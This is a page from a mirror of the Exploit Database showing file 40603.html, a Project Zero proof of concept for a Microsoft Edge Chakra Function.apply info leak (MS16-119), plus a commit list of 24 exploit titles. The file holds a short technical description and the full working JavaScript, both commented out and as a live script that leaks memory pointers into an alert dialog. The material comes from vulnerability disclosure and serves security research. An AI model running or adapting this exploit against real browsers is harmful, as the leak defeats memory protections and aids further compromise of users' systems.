bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/windows/dos/40603.html
Offensive Security 07fdc778ee DB: 2016-10-21 
24 new exploits

NetAuctionHelp 4.1 - search.asp SQL Injection

Apple Mac OSX 10.4.11 2007-008 - i386_set_ldt System Call Local Arbitrary Code Execution
Microsoft Edge - Array.map Heap Overflow (MS16-119)

Microsoft Jet Database Engine - '.MDB' File Parsing Remote Buffer Overflow
Microsoft Edge - Array.join Info Leak (MS16-119)

Windows DeviceApi CMApi PiCMOpenDeviceKey - Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)

HikVision Security Systems - Activex Buffer Overflow
Oracle Netbeans IDE 8.1 - Directory Traversal
MiCasa VeraLite - Remote Code Execution
Oracle BI Publisher 11.1.1.6.0 / 11.1.1.7.0 / 11.1.1.9.0 / 12.2.1.0.0 - XML External Entity Injection
Classifieds Rental Script - SQL Injection
SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service
SAP Adaptive Server Enterprise  16 - Denial of Service
Event Calendar PHP 1.5 - SQL Injection
SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution
SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal
SPIP 3.1.2 - Cross-Site Request Forgery
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Edge - Spread Operator Stack Overflow (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)
Hak5 WiFi Pineapple - Preconfiguration Command Injection (Metasploit)
OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)
2016-10-21 05:01:17 +00:00

84 lines
1.7 KiB
HTML
Executable file
Raw Blame History

<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=920
When Function.apply is called in Chakra, the parameter array is iterated through using JavascriptArray::ForEachItemInRange. This function accepts a templated parameter, hasSideEffect that allows the function to behave safely in the case that iteration has side effects. In JavascriptFunction::CalloutHelper (which is called by Function.apply) this parameter is set to false, even though iterating through the array can have side effects. This can cause an info leak if the side effects cause the array to change types from a numeric array to a variable array. A PoC is as folows and attached. Running this PoC causes an alert dialog with pointers in it.
var t = new Array(1,2,3);
function f(){
var h = [];
var a = [...arguments]
for(item in a){
var n = new Number(a[item]);
if( n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
ta.fill.call(t, "natalie");
return 5;
}
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
-->
<html><body><script>
var t = new Array(1,2,3);
function f(){
var h = [];
var a = [...arguments]
for(item in a){
var n = new Number(a[item]);
if( n < 0){
n = n + 0x100000000;
}
h.push(n.toString(16));
}
alert(h);
}
var q = f;
t.length = 20;
var o = {};
Object.defineProperty(o, '3', {
get: function() {
var ta = [];
ta.fill.call(t, "natalie");
return 5;
}
});
t.__proto__ = o;
var j = [];
var s = f.apply(null, t);
</script></body></html>
Reference in a new issue View git blame Copy permalink